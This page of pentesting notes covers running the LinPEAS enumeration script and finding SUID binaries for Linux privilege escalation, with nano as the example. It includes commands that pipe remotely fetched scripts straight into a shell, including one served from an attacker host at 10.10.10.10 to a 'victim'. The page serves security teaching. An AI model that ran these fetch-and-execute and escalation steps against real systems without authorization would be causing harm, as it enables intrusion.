Views: 9
LinPEAS
Latest Releases: Release Release refs/heads/master 20230425-bd7331ea · carlospolop/PEASS-ng · GitHub
# From Github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Local network
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #VictimPrivilege Escalation: SUID
Finding SUID Binaries
Use the command: “find / -perm -u=s -type f 2>/dev/null” to search the file system for SUID/GUID files. Let’s break down this command.
find – Initiates the “find” command
/ – Searches the whole file system
-perm – searches for files with specific permissions
-u=s – Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form
-type f – Only search for files
2>/dev/null – Suppresses errors
find / -type f -perm -04000 -ls 2>/dev/nullA good practice would be to compare executables on this list with GTFOBins (https://gtfobins.github.io). Clicking on the SUID button will filter binaries known to be exploitable when the SUID bit is set (you can also use this link for a pre-filtered list https://gtfobins.github.io/#+suid).
The list above shows that nano has the SUID bit set. Unfortunately, GTFObins does not provide us with an easy win. Typical to real-life privilege escalation scenarios, we will need to find intermediate steps that will help us leverage whatever minuscule finding we have.